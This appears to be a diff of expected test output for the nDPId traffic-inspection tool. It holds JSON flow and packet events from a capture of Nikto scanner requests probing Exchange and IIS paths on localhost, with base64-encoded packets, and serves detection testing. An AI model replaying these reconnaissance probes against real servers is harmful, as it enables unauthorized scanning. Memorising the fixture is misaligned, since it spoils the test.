+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
